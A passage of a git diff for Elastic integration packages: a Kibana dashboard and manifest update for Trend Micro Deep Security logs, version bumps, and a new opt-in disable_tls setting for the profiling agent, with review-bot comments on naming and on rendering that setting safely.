"7aa88764-249a-46b3-b9cc-f0cb802a8742" + ], + "columns": { + "1b35bee8-d015-4d9d-b531-13405efb426f": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "Event Severity", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "7aa88764-249a-46b3-b9cc-f0cb802a8742", + "type": "column" + }, + "orderDirection": "desc", + 
"otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "event.severity" + }, + "7aa88764-249a-46b3-b9cc-f0cb802a8742": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "530d0aff-656d-449a-a077-460145061b6f", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "7aa88764-249a-46b3-b9cc-f0cb802a8742" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "1b35bee8-d015-4d9d-b531-13405efb426f" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 20, + "i": "b3a67122-6a81-4be6-8b62-4526105b4cce", + "w": 14, + "x": 13, + "y": 0 + }, + "panelIndex": "b3a67122-6a81-4be6-8b62-4526105b4cce", + "title": "Event by Severity [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-83a268fd-8f89-4e7c-8e6a-bc789f616a8d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "83a268fd-8f89-4e7c-8e6a-bc789f616a8d": { + "columnOrder": [ + "be7e6dab-cfd1-4a11-ac2a-8c414127f28b", + "a2b358f2-8602-49c7-8395-812b9dbd0ebc" + ], + "columns": { + "a2b358f2-8602-49c7-8395-812b9dbd0ebc": { + "customLabel": 
true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "be7e6dab-cfd1-4a11-ac2a-8c414127f28b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Action", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a2b358f2-8602-49c7-8395-812b9dbd0ebc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.action" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "a2b358f2-8602-49c7-8395-812b9dbd0ebc" + ], + "layerId": "83a268fd-8f89-4e7c-8e6a-bc789f616a8d", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "be7e6dab-cfd1-4a11-ac2a-8c414127f28b" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 20, + "i": "02556512-72e7-43ce-ad71-3cd710d450d0", + "w": 21, + "x": 27, + "y": 0 + }, + "panelIndex": "02556512-72e7-43ce-ad71-3cd710d450d0", + "title": "Event by Action [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + 
"references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-88a7d45f-887d-4f85-981a-25b55dd4066c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "88a7d45f-887d-4f85-981a-25b55dd4066c": { + "columnOrder": [ + "31abb36d-9e7e-41de-9ecb-e99d0e972da4", + "e332307a-0e05-4cf6-94ad-a221430cbe48" + ], + "columns": { + "31abb36d-9e7e-41de-9ecb-e99d0e972da4": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Category", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "e332307a-0e05-4cf6-94ad-a221430cbe48", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "trendmicro.deep_security.event_category" + }, + "e332307a-0e05-4cf6-94ad-a221430cbe48": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "e332307a-0e05-4cf6-94ad-a221430cbe48" + ], + "layerId": "88a7d45f-887d-4f85-981a-25b55dd4066c", + "layerType": "data", + "position": 
"top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "31abb36d-9e7e-41de-9ecb-e99d0e972da4" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_horizontal_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "9d474498-b09f-4428-94b2-7b15236bdcc8", + "w": 48, + "x": 0, + "y": 20 + }, + "panelIndex": "9d474498-b09f-4428-94b2-7b15236bdcc8", + "title": "Event by Category [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-03032b54-be30-4726-918b-2b08b8404765", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "03032b54-be30-4726-918b-2b08b8404765": { + "columnOrder": [ + "bd2637f1-237c-4e2f-b961-2f7cdd62e9f1", + "83ea58b5-015e-4741-bd7d-dd3af966f462" + ], + "columns": { + "83ea58b5-015e-4741-bd7d-dd3af966f462": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "bd2637f1-237c-4e2f-b961-2f7cdd62e9f1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "83ea58b5-015e-4741-bd7d-dd3af966f462", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": 
"terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "observer.hostname" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "83ea58b5-015e-4741-bd7d-dd3af966f462" + ], + "layerId": "03032b54-be30-4726-918b-2b08b8404765", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "bd2637f1-237c-4e2f-b961-2f7cdd62e9f1" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_horizontal_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "0f5b2a5d-3fda-49c0-ba2a-eed13f24ae99", + "w": 24, + "x": 0, + "y": 34 + }, + "panelIndex": "0f5b2a5d-3fda-49c0-ba2a-eed13f24ae99", + "title": "Event over Hostname [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ae80824c-c802-4c33-a471-b2d45078e03a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { 
+ "ae80824c-c802-4c33-a471-b2d45078e03a": { + "columnOrder": [ + "8bba50e9-6def-48cf-9308-bb9fd3b9e6fb", + "70fe81ad-df26-44e3-a31e-cd3559e642e2" + ], + "columns": { + "70fe81ad-df26-44e3-a31e-cd3559e642e2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "8bba50e9-6def-48cf-9308-bb9fd3b9e6fb": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host ID", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "70fe81ad-df26-44e3-a31e-cd3559e642e2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.id" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "70fe81ad-df26-44e3-a31e-cd3559e642e2" + ], + "layerId": "ae80824c-c802-4c33-a471-b2d45078e03a", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "8bba50e9-6def-48cf-9308-bb9fd3b9e6fb" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": 
"9a0ec7f7-016e-402c-a3c3-8aed4c8d0d6c", + "w": 24, + "x": 24, + "y": 34 + }, + "panelIndex": "9a0ec7f7-016e-402c-a3c3-8aed4c8d0d6c", + "title": "Event over Host ID [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c1ecdea5-0c0f-4fed-b82d-5b36b3889511", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c1ecdea5-0c0f-4fed-b82d-5b36b3889511": { + "columnOrder": [ + "f150c670-4eb5-4401-b3e5-e8dc4cc3df9c", + "1dab2338-b858-4296-b556-425eea4754e1" + ], + "columns": { + "1dab2338-b858-4296-b556-425eea4754e1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "f150c670-4eb5-4401-b3e5-e8dc4cc3df9c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Code", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1dab2338-b858-4296-b556-425eea4754e1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.code" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + 
}, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "1dab2338-b858-4296-b556-425eea4754e1" + ], + "layerId": "c1ecdea5-0c0f-4fed-b82d-5b36b3889511", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "f150c670-4eb5-4401-b3e5-e8dc4cc3df9c" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_horizontal_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 16, + "i": "93dd4f88-7776-471d-97c4-171b5dd83d37", + "w": 48, + "x": 0, + "y": 49 + }, + "panelIndex": "93dd4f88-7776-471d-97c4-171b5dd83d37", + "title": "Event by Code [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-5f3b1845-4299-4863-bcb7-5de7e2c1ad22", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "5f3b1845-4299-4863-bcb7-5de7e2c1ad22": { + "columnOrder": [ + "67dbe9ab-f18e-4bc9-a103-c95629926a88", + "ff8ea686-753d-4f48-bf90-9d03757eb27c" + ], + "columns": { + "67dbe9ab-f18e-4bc9-a103-c95629926a88": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Destination IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "ff8ea686-753d-4f48-bf90-9d03757eb27c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 
+ }, + "scale": "ordinal", + "sourceField": "destination.ip" + }, + "ff8ea686-753d-4f48-bf90-9d03757eb27c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "67dbe9ab-f18e-4bc9-a103-c95629926a88", + "isTransposed": false + }, + { + "columnId": "ff8ea686-753d-4f48-bf90-9d03757eb27c", + "isTransposed": false + } + ], + "layerId": "5f3b1845-4299-4863-bcb7-5de7e2c1ad22", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "b62308e5-e9cc-423b-802a-5346bec4a83a", + "w": 24, + "x": 0, + "y": 65 + }, + "panelIndex": "b62308e5-e9cc-423b-802a-5346bec4a83a", + "title": "Top Destination IP Addresses [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-04346474-aa93-46d7-99f1-5bcf54e01bc8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "04346474-aa93-46d7-99f1-5bcf54e01bc8": { + "columnOrder": [ + "a2c3e2fb-06bf-4817-ab4f-ebc6a3569d75", + "9bb49132-3c1b-4d3a-8253-9db49ae0bc69" + ], + "columns": { + "9bb49132-3c1b-4d3a-8253-9db49ae0bc69": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": 
"___records___" + }, + "a2c3e2fb-06bf-4817-ab4f-ebc6a3569d75": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Source IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9bb49132-3c1b-4d3a-8253-9db49ae0bc69", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "source.ip" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "a2c3e2fb-06bf-4817-ab4f-ebc6a3569d75", + "isTransposed": false + }, + { + "columnId": "9bb49132-3c1b-4d3a-8253-9db49ae0bc69", + "isTransposed": false + } + ], + "layerId": "04346474-aa93-46d7-99f1-5bcf54e01bc8", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "34396378-6eb7-4756-ad5f-828bcbe84787", + "w": 24, + "x": 24, + "y": 65 + }, + "panelIndex": "34396378-6eb7-4756-ad5f-828bcbe84787", + "title": "Top Source IP Addresses [Logs Trend Micro]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs Trend Micro] Deep Security", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-07T06:48:54.569Z", + "id": "trendmicro-5036f0c0-c1c5-11ee-9590-81e76a30321d", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"b3a67122-6a81-4be6-8b62-4526105b4cce:indexpattern-datasource-layer-530d0aff-656d-449a-a077-460145061b6f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "02556512-72e7-43ce-ad71-3cd710d450d0:indexpattern-datasource-layer-83a268fd-8f89-4e7c-8e6a-bc789f616a8d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9d474498-b09f-4428-94b2-7b15236bdcc8:indexpattern-datasource-layer-88a7d45f-887d-4f85-981a-25b55dd4066c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0f5b2a5d-3fda-49c0-ba2a-eed13f24ae99:indexpattern-datasource-layer-03032b54-be30-4726-918b-2b08b8404765", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9a0ec7f7-016e-402c-a3c3-8aed4c8d0d6c:indexpattern-datasource-layer-ae80824c-c802-4c33-a471-b2d45078e03a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "93dd4f88-7776-471d-97c4-171b5dd83d37:indexpattern-datasource-layer-c1ecdea5-0c0f-4fed-b82d-5b36b3889511", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b62308e5-e9cc-423b-802a-5346bec4a83a:indexpattern-datasource-layer-5f3b1845-4299-4863-bcb7-5de7e2c1ad22", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "34396378-6eb7-4756-ad5f-828bcbe84787:indexpattern-datasource-layer-04346474-aa93-46d7-99f1-5bcf54e01bc8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_5c39feda-a37e-412b-b289-bfe4b7431187:rangeSliderDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_741c9ea5-a76e-4689-813a-575608fba5b0:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "trendmicro-security-solution-default", + "name": "tag-ref-trendmicro-security-solution-default", + "type": "tag" + }, + { + "id": "trendmicro-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file 
diff --git a/packages/trendmicro/kibana/tag/trendmicro-security-solution-default.json b/packages/trendmicro/kibana/tag/trendmicro-security-solution-default.json
new file mode 100644
index 00000000000..1ea0d06a310
--- /dev/null
+++ b/packages/trendmicro/kibana/tag/trendmicro-security-solution-default.json
@@ -0,0 +1,14 @@
+{
+ "attributes": {
+ "color": "#9696F1",
+ "description": "Tag defined in package-spec",
+ "name": "Security Solution"
+ },
+ "coreMigrationVersion": "8.8.0",
+ "created_at": "2024-02-06T09:32:11.830Z",
+ "id": "trendmicro-security-solution-default",
+ "managed": false,
+ "references": [],
+ "type": "tag",
+ "typeMigrationVersion": "8.0.0"
+}
\ No newline at end of file
diff --git a/packages/trendmicro/manifest.yml b/packages/trendmicro/manifest.yml
index 8c4594a638e..7ee4aef99cc 100644
--- a/packages/trendmicro/manifest.yml
+++ b/packages/trendmicro/manifest.yml
@@ -1,41 +1,42 @@
 format_version: "3.0.0"
 name: trendmicro
-title: "Trendmicro"
-version: "1.8.4"
-description: "collect Trendmicro Deep Security events with elastic agent."
+title: Trend Micro Deep Security
+version: "2.2.0"
+description: Collect logs from Trend Micro Deep Security with Elastic Agent.
 type: integration
 categories:
 - network
+ - edr_xdr
 - security
 conditions:
 kibana:
- version: "^8.6.0"
+ version: "^8.11.0"
 elastic:
- subscription: "basic"
+ subscription: basic
 screenshots:
- - src: /img/trend-micro-deep-security-dashboard-screenshot.png
+ - src: /img/trendmicro-deep_security-dashboard.png
 title: Trend Micro Deep Security Overview Screenshot
 size: 600x600
 type: image/png
 icons:
- - src: /img/Trend-Micro-Logo.svg
+ - src: /img/trend-micro-logo.svg
 title: Trendmicro logo
 size: 32x32
 type: image/svg+xml
 policy_templates:
 - name: trendmicro
- title: Trendmicro Deep Security logs
- description: Collect deep security logs
+ title: Trend Micro Deep Security logs
+ description: Collect Deep Security logs.
 inputs:
- - type: filestream
- title: "Collect Trendmicro Deep Security logs (input: filestream)."
- description: "Collecting deep security logs from instances (input: filestream)."
- - type: udp
- title: "Collect CEF Deep Security logs (input: udp)"
- description: "Collecting deep security logs from CEF instances (input: udp)."
 - type: tcp
- title: "Collect CEF Deep Security logs (input: tcp)"
- description: "Collecting deep security logs from CEF instances (input: tcp)."
+ title: Collect logs from Trend Micro Deep Security via TCP
+ description: Collecting logs from Trend Micro Deep Security via TCP.
+ - type: udp
+ title: Collect logs from Trend Micro Deep Security via UDP
+ description: Collecting logs from Trend Micro Deep Security via UDP.
+ - type: filestream
+ title: Collect logs from Trend Micro Deep Security via Filestream
+ description: Collecting logs from Trend Micro Deep Security via File.
owner:
- github: elastic/sec-deployment-and-devices
- type: community
+ github: elastic/security-service-integrations
+ type: elastic
diff --git a/packages/udp/changelog.yml b/packages/udp/changelog.yml
index 3287aa0a4b2..c66f569dd03 100644
--- a/packages/udp/changelog.yml
+++ b/packages/udp/changelog.yml
@@ -1,3 +1,8 @@
+- version: "1.19.0"
+ changes:
+ - description: Update package-spec to 3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9235
 - version: "1.18.1"
 changes:
 - description: Changed owners
diff --git a/packages/udp/manifest.yml b/packages/udp/manifest.yml
index 8c41e1f2c40..b22314418b0 100644
--- a/packages/udp/manifest.yml
+++ b/packages/udp/manifest.yml
@@ -1,9 +1,9 @@
-format_version: "3.0.0"
+format_version: "3.0.3"
 name: udp
 title: Custom UDP Logs
 description: Collect raw UDP data from listening UDP port with Elastic Agent.
 type: integration
-version: "1.18.1"
+version: "1.19.0"
 conditions:
 kibana:
 version: "^8.2.1"
diff --git a/packages/universal_profiling_agent/agent/input/input.yml.hbs b/packages/universal_profiling_agent/agent/input/input.yml.hbs
index 34695de8eed..2228d1bcfdb 100644
--- a/packages/universal_profiling_agent/agent/input/input.yml.hbs
+++ b/packages/universal_profiling_agent/agent/input/input.yml.hbs
@@ -4,3 +4,4 @@ pf-host-agent:
 connect_proxy: {{profiler.connect_proxy}}
 probabilistic_threshold: {{profiler.probabilistic_threshold}}
 probabilistic_interval: {{profiler.probabilistic_interval}}
+ disable_tls: {{profiler.disable_tls}}
diff --git a/packages/universal_profiling_agent/changelog.yml b/packages/universal_profiling_agent/changelog.yml
index 9276394160b..d397b35de69 100644
--- a/packages/universal_profiling_agent/changelog.yml
+++ b/packages/universal_profiling_agent/changelog.yml
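Review bot: The icon entry still reads `title: Trendmicro logo` while this hunk changes every other user-facing string to "Trend Micro"; `title: Trend Micro logo` keeps the manifest consistent. The filestream input is titled "via Filestream" but described "via File"; `description: Collecting logs from Trend Micro Deep Security via filestream.` would align the pair. The renamed screenshot and icon paths (`/img/trendmicro-deep_security-dashboard.png`, `/img/trend-micro-logo.svg`) need matching files under the package's img directory, which this chunk does not show.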
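Review bot: The added `disable_tls: {{profiler.disable_tls}}` is rendered unconditionally, so a policy that does not carry the new variable (one created before this version, unless Fleet backfills the manifest default on upgrade) yields `disable_tls: ` with an empty value, and how the agent treats an empty value is not visible here. Wrapping it as `{{#if profiler.disable_tls}}disable_tls: true{{/if}}` keeps older policies rendering exactly as before and only emits the key when the operator has opted in. The neighbouring keys are rendered the same unconditional way, so this is a trade-off between matching the file's style and being robust for a setting that turns off transport encryption.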
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: 8.13.2
+ changes:
+ - description: Add disable_tls option
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9523
 - version: 8.12.0
 changes:
 - description: Add privileges section and update to 3.0.2 format
diff --git a/packages/universal_profiling_agent/manifest.yml b/packages/universal_profiling_agent/manifest.yml
index 0001ed57cda..9f8d53f1db3 100644
--- a/packages/universal_profiling_agent/manifest.yml
+++ b/packages/universal_profiling_agent/manifest.yml
@@ -1,11 +1,11 @@
 name: profiler_agent
 title: Universal Profiling Agent
-version: 8.12.0
+version: 8.13.2
 categories: ["elastic_stack", "monitoring"]
 description: Fleet-wide, whole-system, continuous profiling with zero instrumentation.
 conditions:
 kibana:
- version: ^8.12.0
+ version: ^8.13.2
 elastic:
 subscription: basic
 format_version: 3.0.2
@@ -56,6 +56,12 @@ policy_templates:
 description: Time interval for which probabilistic profiling will be enabled or disabled. (default 1m0s)
 show_user: true
 type: text
+ - name: profiler.disable_tls
+ title: Disable TLS
+ description: Disable encryption for data in transit. (default false)
+ show_user: true
+ type: bool
+ default: false
 multiple: false
 agent:
 privileges:
diff --git a/packages/vectra_detect/changelog.yml b/packages/vectra_detect/changelog.yml
index bcaf85bdd7c..c048b595383 100644
--- a/packages/vectra_detect/changelog.yml
+++ b/packages/vectra_detect/changelog.yml
@@ -1,4 +1,14 @@
 # newer versions go on top
+- version: "1.8.0"
+ changes:
+ - description: Update manifest format version to v3.0.3.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9521
+- version: "1.7.2"
+ changes:
+ - description: Clean up null handling
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9151
 - version: "1.7.1"
 changes:
 - description: Changed owners
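Review bot: The `profiler.disable_tls` description, `Disable encryption for data in transit. (default false)`, does not tell the operator what enabling it means in practice, even though `show_user: true` places it next to ordinary tuning options. A more explicit wording such as `description: Disable TLS for the connection to the collector; profiling data is then sent in clear text. Intended for local testing only. (default false)` makes the consequence visible in the Fleet UI. The new `default: false` is what input.yml.hbs relies on to render a value on every policy, so the two hunks should land together.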
